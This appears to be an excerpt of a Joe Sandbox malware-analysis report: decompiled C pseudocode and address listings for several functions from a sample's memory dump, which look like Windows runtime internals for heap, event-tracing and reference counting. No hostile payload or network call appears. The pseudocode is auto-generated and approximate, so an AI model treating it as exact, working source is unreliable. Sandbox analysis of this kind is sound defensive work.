                    0x016c37b2
                    0x01669187
                    0x01669187
                    0x0166918a
                    0x0166918d
                    0x0166918f
                    0x01669192
                    0x01669195
                    0x00000000
                    0x01669195
                    0x00000000
                    0x01669187
                    0x016c376a
                    0x016c376a
                    0x016c376c
                    0x016c376c
                    0x016c376f
                    0x016c3775
                    0x00000000
                    0x00000000
                    0x016c3777
                    0x016c3779
                    0x00000000
                    0x00000000
                    0x016c3782
                    0x016c3787
                    0x016c3789
                    0x016c3790
                    0x016c3790
                    0x016c378b
                    0x016c378b
                    0x016c378b
                    0x016c3792
                    0x016c3795
                    0x016c3795
                    0x016c3798
                    0x016c3798
                    0x016c379b
                    0x016c379b
                    0x016691a3
                    0x016691a9
                    0x016691b0
                    0x016691b4
                    0x016691b4
                    0x016691bb
                    0x016691c0
                    0x016691c5
                    0x016691c7
                    0x016c37da
                    0x016691cd
                    0x016691cd
                    0x016691cd
                    0x016691d2
                    0x016691d5
                    0x01669239
                    0x01669239
                    0x016691d7
                    0x016691db
                    0x016691e1
                    0x016691e7
                    0x016691fd
                    0x01669203
                    0x0166921e
                    0x01669223
                    0x00000000
                    0x01669223
                    0x01669205
                    0x01669208
                    0x0166920c
                    0x01669214
                    0x01669214
                    0x016691e9
                    0x016691e9
                    0x016691ee
                    0x016691f3
                    0x016691f3
                    0x016691f3
                    0x016691e7
                    0x00000000
                    0x016691db
                    0x01669187
                    0x01669168

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9ba97aebe938f9a8f40d6b795c7bcaecbae6579c9ee775f47ebe15c2903d37e0
                    • Instruction ID: dd67854ca5652899141bbc394a70447cd5c93b04a405bb9907c1e38e74082192
                    • Opcode Fuzzy Hash: 9ba97aebe938f9a8f40d6b795c7bcaecbae6579c9ee775f47ebe15c2903d37e0
                    • Instruction Fuzzy Hash: 8731A375A01245DFDB25DF6CC9887ACFBF9BB98329F24815DC90467342C374A980CB66
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01691DB5 Relevance: .1, Instructions: 87COMMON
                    Download Yara Rule
                    C-Code - Quality: 60%
                    			E01691DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E0168F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L01684620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E0168F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                    0x01691dc2
                    0x01691dc5
                    0x01691dc7
                    0x01691dcc
                    0x01691dce
                    0x01691dd6
                    0x01691ddf
                    0x01691de0
                    0x01691de1
                    0x01691de5
                    0x01691de8
                    0x01691def
                    0x01691df0
                    0x01691df6
                    0x01691df7
                    0x01691dfe
                    0x01691e1a
                    0x00000000
                    0x00000000
                    0x01691e0b
                    0x01691e12
                    0x01691e12
                    0x01691e00
                    0x01691e00
                    0x01691e05
                    0x01691e1e
                    0x01691e23
                    0x016d570f
                    0x016d5713
                    0x00000000
                    0x00000000
                    0x016d5719
                    0x016d5719
                    0x01691e2c
                    0x01691e2d
                    0x01691e2e
                    0x01691e2f
                    0x01691e31
                    0x01691e32
                    0x01691e35
                    0x01691e3d
                    0x016d5723
                    0x016d573d
                    0x016d573d
                    0x00000000
                    0x016d5723
                    0x01691e49
                    0x01691e4e
                    0x01691e4e
                    0x01691e09
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                    • Instruction ID: 4843ca81c11abe6fc00a30740ca25655d8a9a71a94a6f0c293f76b5c77de4c20
                    • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                    • Instruction Fuzzy Hash: 19216272A0011AFFDB21DF59CD80EABBBBDEF86654F254155FA0597210DB34AE01C7A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01680050 Relevance: .1, Instructions: 81COMMON
                    Download Yara Rule
                    C-Code - Quality: 53%
                    			E01680050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x175d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E01699ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E016AB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E01738A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E01699702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x175b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                    0x01680055
                    0x0168005d
                    0x01680062
                    0x0168006c
                    0x0168006f
                    0x01680074
                    0x0168007a
                    0x0168007a
                    0x01680080
                    0x01680080
                    0x01680087
                    0x0168008d
                    0x0168008f
                    0x01680093
                    0x01680095
                    0x0168009b
                    0x016800f8
                    0x016800fb
                    0x016800fc
                    0x016800ff
                    0x01680108
                    0x01680108
                    0x016800a2
                    0x016800a6
                    0x016800b3
                    0x016800bc
                    0x016800c5
                    0x016800ca
                    0x016cc01e
                    0x00000000
                    0x00000000
                    0x016cc02d
                    0x016800d5
                    0x016800d9
                    0x016cc03d
                    0x016cc046
                    0x016cc046
                    0x016800df
                    0x016800e2
                    0x016800ea
                    0x016800ef
                    0x016800f2
                    0x016800f6
                    0x01680111
                    0x01680117
                    0x01680117
                    0x00000000
                    0x016800f6
                    0x016800d0
                    0x016800d0
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 82b5ac4a0fb0fd74880f9664b857056fb9f09c8658238faf69a0cfedc32d138b
                    • Instruction ID: cfa331619420440de8cdb1b562088d2c4c954ce83b55c7d70408439ec5d03622
                    • Opcode Fuzzy Hash: 82b5ac4a0fb0fd74880f9664b857056fb9f09c8658238faf69a0cfedc32d138b
                    • Instruction Fuzzy Hash: 1D318E31201B04CFD722DB28CC44B66B7E5FF89714F144A6DE59A87790DB75A806CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016E6C0A Relevance: .1, Instructions: 79COMMON
                    Download Yara Rule
                    C-Code - Quality: 77%
                    			E016E6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E01687D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x1757b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L01684620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E016AF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E01687D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E016A9AE0();
						_t23 = L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                    0x016e6c0a
                    0x016e6c0f
                    0x016e6c10
                    0x016e6c13
                    0x016e6c15
                    0x016e6c19
                    0x016e6c1c
                    0x016e6c21
                    0x016e6c28
                    0x016e6c3a
                    0x016e6c2a
                    0x016e6c33
                    0x016e6c33
                    0x016e6c3f
                    0x016e6c48
                    0x016e6c4d
                    0x016e6c60
                    0x016e6c65
                    0x016e6c69
                    0x016e6c73
                    0x016e6c79
                    0x016e6c7f
                    0x016e6c86
                    0x016e6c90
                    0x016e6c94
                    0x016e6ca6
                    0x016e6cb2
                    0x016e6cbd
                    0x016e6cbd
                    0x016e6cc3
                    0x016e6cc7
                    0x016e6ccb
                    0x016e6cd0
                    0x016e6cd1
                    0x016e6ce2
                    0x016e6ce2
                    0x016e6c69
                    0x016e6ced

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5e0797e510d3fd1c56d28258c615d0a4ee73a24d76e98810361fd8ba75a36374
                    • Instruction ID: 09a406ee402bb2babd956298717b06720a50159b411cfb640691660797663b9a
                    • Opcode Fuzzy Hash: 5e0797e510d3fd1c56d28258c615d0a4ee73a24d76e98810361fd8ba75a36374
                    • Instruction Fuzzy Hash: D5219A72A00645ABD715DF68DC84E2AB7E8FF58700F1401A9F904CB790D734ED50CBA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016A90AF Relevance: .1, Instructions: 76COMMON
                    Download Yara Rule
                    C-Code - Quality: 82%
                    			E016A90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E016BD4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E0169E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L01684620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E016AF3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0169A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                    0x016a90af
                    0x016a90b8
                    0x016a90bb
                    0x016a90bf
                    0x016a90c2
                    0x016a90c2
                    0x016a90c8
                    0x016a90cb
                    0x016a90cd
                    0x016e14d7
                    0x016e14eb
                    0x016e14eb
                    0x00000000
                    0x016e14eb
                    0x016e14db
                    0x016e14e6
                    0x00000000
                    0x016e14f2
                    0x016e14e8
                    0x00000000
                    0x016e14e8
                    0x016a90d8
                    0x016a90da
                    0x016a90dd
                    0x016a90e5
                    0x00000000
                    0x016a9139
                    0x016a90fa
                    0x016a90fe
                    0x016a9142
                    0x00000000
                    0x016a9142
                    0x016a9104
                    0x016a9107
                    0x016a910b
                    0x016a9110
                    0x016a9118
                    0x016a9147
                    0x016a9148
                    0x016a914f
                    0x016a9150
                    0x016a9151
                    0x016a9152
                    0x016a9156
                    0x016a915d
                    0x016a9160
                    0x016a9168
                    0x016a916c
                    0x016a91bc
                    0x016a91be
                    0x00000000
                    0x016a91be
                    0x016a916e
                    0x016a9173
                    0x016a9176
                    0x00000000
                    0x00000000
                    0x016a917c
                    0x016a9180
                    0x016a91b5
                    0x00000000
                    0x016a91b5
                    0x016a9182
                    0x016a9185
                    0x016a9189
                    0x00000000
                    0x00000000
                    0x016a918e
                    0x016a9190
                    0x016a9198
                    0x00000000
                    0x00000000
                    0x016a91a0
                    0x00000000
                    0x016a91ad
                    0x016a91ad
                    0x016a91b0
                    0x016a91b1
                    0x00000000
                    0x016a9185
                    0x016a911a
                    0x016a911c
                    0x016a911f
                    0x016a9125
                    0x016a9127
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                    • Instruction ID: 1ec49a2479c8391b71f3efd63904d97bb1e47160c491dc49dadd3e4a02819ff7
                    • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                    • Instruction Fuzzy Hash: AF217F71A01205EFDB21DF59CC44AAAFBF8EB54354F24886EE949A7300D330AD40CF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01693B7A Relevance: .1, Instructions: 75COMMON
                    Download Yara Rule
                    C-Code - Quality: 59%
                    			E01693B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x17584c4; // 0x0
				_v12 = 1;
				_v8 =  *0x17584c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L01684620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x17584c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E016AAA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E016AFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x17584c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x17584c4; // 0x0
					L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                    0x01693b89
                    0x01693b96
                    0x01693ba1
                    0x01693bab
                    0x01693bb5
                    0x01693bb9
                    0x016d6298
                    0x01693bbf
                    0x01693bc2
                    0x01693bc3
                    0x01693bc9
                    0x01693bca
                    0x01693bcc
                    0x01693bcd
                    0x01693bd4
                    0x01693bd6
                    0x01693bdb
                    0x01693bea
                    0x01693bf7
                    0x01693bfb
                    0x01693bff
                    0x01693c09
                    0x01693c0a
                    0x01693c0b
                    0x01693c0f
                    0x01693c14
                    0x01693c18
                    0x01693c18
                    0x01693bfb
                    0x01693c1b
                    0x01693c30
                    0x01693c30
                    0x01693c3d

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a14d6ea8d3a9d3b58a439b4c3999e8e786306e96dcd5098edd9e3ebd4fbff5ab
                    • Instruction ID: 87c21b1a015b9c1b97254ea28c9032ecf3a1b2b44c5ba729d5485444c2d30c29
                    • Opcode Fuzzy Hash: a14d6ea8d3a9d3b58a439b4c3999e8e786306e96dcd5098edd9e3ebd4fbff5ab
                    • Instruction Fuzzy Hash: DE21A472A00515EFCB10DF98CD81F6ABBBDFB44718F154169EA04AB251D771ED01CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016E6CF0 Relevance: .1, Instructions: 74COMMON
                    Download Yara Rule
                    C-Code - Quality: 80%
                    			E016E6CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E01687D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E01687D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x1645c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E0169F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E0169F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E016E7016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L01682400( &_v52);
								}
								_t21 = L01682400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                    0x016e6cfb
                    0x016e6d00
                    0x016e6d02
                    0x016e6d06
                    0x016e6d0a
                    0x016e6d0e
                    0x016e6d19
                    0x016e6d2b
                    0x016e6d1b
                    0x016e6d24
                    0x016e6d24
                    0x016e6d33
                    0x016e6d39
                    0x016e6d46
                    0x016e6d4f
                    0x016e6d61
                    0x016e6d51
                    0x016e6d5a
                    0x016e6d5a
                    0x016e6d69
                    0x016e6d6b
                    0x016e6d6d
                    0x016e6d6f
                    0x016e6d6f
                    0x016e6d74
                    0x016e6d79
                    0x016e6d7a
                    0x016e6d7f
                    0x016e6d82
                    0x016e6d88
                    0x016e6d89
                    0x016e6d90
                    0x016e6d94
                    0x016e6da7
                    0x016e6db1
                    0x016e6db1
                    0x016e6dbb
                    0x016e6dbb
                    0x016e6d90
                    0x016e6d69
                    0x016e6d46
                    0x016e6dc6

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 26231e70f4ae73df55f118f686b97144b8c49ab7617d7d732dc67705a3d29ab0
                    • Instruction ID: bd3f4a0bd10a8f194da1a1fa21f3648a1ff64675023bc59df2e3146ccd09ec46
                    • Opcode Fuzzy Hash: 26231e70f4ae73df55f118f686b97144b8c49ab7617d7d732dc67705a3d29ab0
                    • Instruction Fuzzy Hash: 6D2134734023499BD711EF2CCD48B6BBBECEFA1240F04065AFA40CB251E731C948C6A6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0173070D Relevance: .1, Instructions: 72COMMON
                    Download Yara Rule
                    C-Code - Quality: 67%
                    			E0173070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E017307DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0172AFDE( &_v8,  &_v12);
					E01731293(_t38, _v28, _t60);
					if(E01687D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E017214FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                    0x0173071b
                    0x01730724
                    0x01730734
                    0x01730738
                    0x0173074b
                    0x0173074b
                    0x01730753
                    0x01730753
                    0x01730759
                    0x0173075d
                    0x01730774
                    0x01730779
                    0x0173077d
                    0x01730789
                    0x01730795
                    0x017307a7
                    0x01730797
                    0x017307a0
                    0x017307a0
                    0x017307af
                    0x017307c4
                    0x017307cd
                    0x017307cd
                    0x017307af
                    0x017307dc

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                    • Instruction ID: 276bb7402d0a7a3e44a17d8de656c57b3e9ba9cb17c3a0c3e8305a76e95e9f09
                    • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                    • Instruction Fuzzy Hash: 762104362042009FDB16DF1CC884B6ABBA5EFD4350F048669F9958B386D730D91ACB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016E7794 Relevance: .1, Instructions: 70COMMON
                    Download Yara Rule
                    C-Code - Quality: 82%
                    			E016E7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x1757b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L01684620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E016AF3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E01687D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E016A9AE0();
					_t24 = L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                    0x016e7799
                    0x016e779a
                    0x016e779b
                    0x016e77a3
                    0x016e77ab
                    0x016e77ae
                    0x016e77b1
                    0x016e77b1
                    0x016e77bf
                    0x016e77c4
                    0x016e77c8
                    0x016e77ce
                    0x016e77d4
                    0x016e77e0
                    0x016e77e0
                    0x016e77d6
                    0x016e77d6
                    0x016e77de
                    0x00000000
                    0x00000000
                    0x016e77de
                    0x016e77e5
                    0x016e77f0
                    0x016e77f3
                    0x016e77f6
                    0x016e77fd
                    0x016e7800
                    0x016e780c
                    0x016e7818
                    0x016e782b
                    0x016e781a
                    0x016e7823
                    0x016e7823
                    0x016e7830
                    0x016e7831
                    0x016e7838
                    0x016e783d
                    0x016e783e
                    0x016e784f
                    0x016e784f
                    0x016e785a

